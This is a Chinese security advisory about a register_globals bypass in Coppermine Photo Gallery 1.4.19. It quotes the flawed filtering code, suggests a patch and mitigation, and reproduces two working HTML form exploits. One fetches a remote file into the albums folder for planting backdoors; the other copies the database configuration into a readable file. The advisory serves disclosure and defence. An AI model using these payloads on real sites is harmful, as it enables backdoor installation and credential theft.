安全研究
安全漏洞
Coppermine Photo Gallery变量内容重写漏洞
发布日期:2009-01-30
更新日期:2009-02-01
受影响系统:
Coppermine Photo Gallery 1.x描述:
Coppermine Photo Gallery
Coppermine是用PHP编写的多用途集成Web图形库脚本。
Coppermine Photo Gallery处理用户请求数据时存在漏洞,远程攻击者可能利用此漏洞上传PHP脚本文件从而控制应用系统。
系统的include/init.inc.php脚本在过滤处理全局变量时存在问题,远程攻击者可以据此绕过安全限制上传任意脚本文件实现命令执行。要利用此漏洞需要系统的PHP打开register_globals选项。
<*来源:Michael Brooks
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Special thanks to str0ke!
Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057 downloads from sf.net!
For this attack we need register_globals=on . The problem is that
the anti-register_globals security can be bypassed.
This is in /include/init.inc.php starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
if (is_array($_POST)) {
foreach ($_POST as $key => $value) {
if (!is_array($value))
$_POST[$key] = strtr($value, $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
}
}
if (is_array($_GET)) {
foreach ($_GET as $key => $value) {
unset($_GET[$key]);
$_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
}
}
if (is_array($_COOKIE)) {
foreach ($_COOKIE as $key => $value) {
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
}
}
if (is_array($_REQUEST)) {
foreach ($_REQUEST as $key => $value) {
if (!is_array($value))
$_REQUEST[$key] = strtr($value, $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
}
}
//...
Here is a patch that will take care of register_globals.
if(ini_get(register_globals)){
foreach(get_defined_vars() as $var=>$val){
//only keep superglobals we need on this whitelist, _SESSION will take care of its self:
if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
unset($$var);
}
}
}
These 2 exploits are written in HTM, but they are NOT XSRF! This is
a global variable manipulation issue, you can exploit this with CURL
or whatever.
This will copy www.google.com to
http://127.0.0.1/cpg1419/albums/test.php . This is very useful for
uploading backdoors.
This is hijacking a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭系统PHP的register_globals选项。
厂商补丁:
Coppermine
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.chezgreg.net/coppermine/
浏览次数:28823
严重程度:0(网友投票)
绿盟科技给您安全的保障